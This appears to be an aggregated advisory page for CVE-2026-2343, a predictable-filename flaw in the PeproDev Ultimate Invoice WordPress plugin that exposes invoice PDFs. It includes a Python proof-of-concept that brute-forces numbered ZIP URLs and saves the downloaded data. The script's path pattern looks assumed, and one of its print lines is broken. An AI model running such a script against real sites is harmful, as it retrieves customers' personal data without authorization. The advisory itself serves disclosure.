Security Vulnerability Report
CVE-2026-2343 CVSS 5.3 MEDIUM

Published: 2026-03-25 06:16:28
Last Modified: 2026-04-15 15:05:48

Description

The PeproDev Ultimate Invoice WordPress plugin through 2.2.5 has a bulk download invoices action that generates ZIP archives containing exported invoice PDFs. The ZIP files are named predictably, making it possible to brute force and retrieve PII.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PeproDev Ultimate Invoice <= 2.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration
target_domain = "http://example.com"
base_url = f"{target_domain}/wp-content/uploads/peprodev-invoices/export_"
extension = ".zip"

# Function to brute force predictable filenames
def brute_force_invoices(start_id, end_id):
    for i in range(start_id, end_id):
        # Construct predictable filename based on pattern
        filename = f"{base_url}{i}{extension}"
        try:
            response = requests.get(filename, timeout=3)
            if response.status_code == 200:
                print(f"[+] Success! Found file: (unknown)")
                # Save the downloaded PII data
                with open(f"invoice_dump_{i}.zip", "wb") as f:
                    f.write(response.content)
                return True
        except requests.RequestException:
            continue
    return False

# Execute brute force
brute_force_invoices(1000, 5000)

References

https://wpscan.com/vulnerability/ac1572ca-7994-401d-a268-6a8773e60ab1/
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2343", "sourceIdentifier": "[email protected]", "published": "2026-03-25T06:16:28.407", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PeproDev Ultimate Invoice WordPress plugin through 2.2.5 has a bulk download invoices action that generates ZIP archives containing exported invoice PDFs. The ZIP files are named predictably making it possible to brute force and retreive PII."}, {"lang": "es", "value": "El plugin de WordPress PeproDev Ultimate Invoice hasta la versión 2.2.5 tiene una acción de descarga masiva de facturas que genera archivos ZIP que contienen PDFs de facturas exportadas. Los archivos ZIP se nombran de forma predecible, lo que permite forzar por fuerza bruta y recuperar PII."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/ac1572ca-7994-401d-a268-6a8773e60ab1/", "source": "[email protected]"}]}}